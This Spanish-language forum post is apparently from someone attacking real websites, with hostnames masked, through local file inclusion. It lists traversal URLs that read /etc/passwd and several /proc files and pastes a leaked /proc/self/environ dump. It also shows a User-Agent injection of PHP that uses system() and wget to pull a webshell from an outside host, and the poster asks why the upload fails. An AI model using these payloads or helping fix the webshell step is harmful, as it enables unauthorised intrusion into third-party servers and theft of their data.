Tengo un par de web que son vulnerables a LFI. Puedo ver varios archivos como:
Citarhttp://www.xxxxxx.com/index.php?XXX=%2F..%2Fetc%2Fpasswd%00
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fetc%2Fgroup%00
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fnet%2Farp
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fcpuinfo
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fpartitions
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fversion
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2F1%2Fmounts
pero no puede ver
etc/self/environ
porque?
En otra web que si puedo verlo:
CitarDOCUMENT_ROOT=/home/*********/public_html�GATEWAY_INTERFACE=CGI/1.1�HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8�HTTP_ACCEPT_CHARSET=TIS-620,utf-8;q=0.7,*;q=0.7�HTTP_ACCEPT_ENCODING=gzip,deflate�HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5�HTTP_CONNECTION=keep-alive�HTTP_HOST=www.***************.com.pt�HTTP_KEEP_ALIVE=115�HTTP_USER_AGENT=AQUI DEBE IR LA SHELL�PATH=/bin:/usr/bin�QUERY_STRING=content=*******/*******.php/../../../../../../proc/self/environ�REDIRECT_STATUS=200�REMOTE_ADDR=***.***.***.***�REMOTE_PORT=47433�REQUEST_METHOD=GET�REQUEST_URI=/*****.php?**********=***/*****.php/../../../../../../proc/self/environ�SCRIPT_FILENAME=/home/******/public_html/index.php�SCRIPT_NAME=/index.php�SERVER_ADDR=***.***.***.***�SERVER_ADMIN=webmaster@**********.com.**�SERVER_NAME=www.***********.com.**�SERVER_PORT=80�SERVER_PROTOCOL=HTTP/1.1�SERVER_SIGNATURE=�
SERVER_SOFTWARE=Apache�UNIQUE_ID=**************_****�
cuando sustituyo el campo USER-AGENT con live http header, para subir una webshell
<?system ('wget http://rutadeunawebshell.com/shell.txt -o shell.php');?>esta opcion me aparece vacia an la ventana del firefox, y cuando trato de ir a la webshell, no esta.
CitarNot Found
The requested URL /shell.php was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Alguien puede explicarme el porque?
estoy haciendo algo mal? (aparte de lo obvio)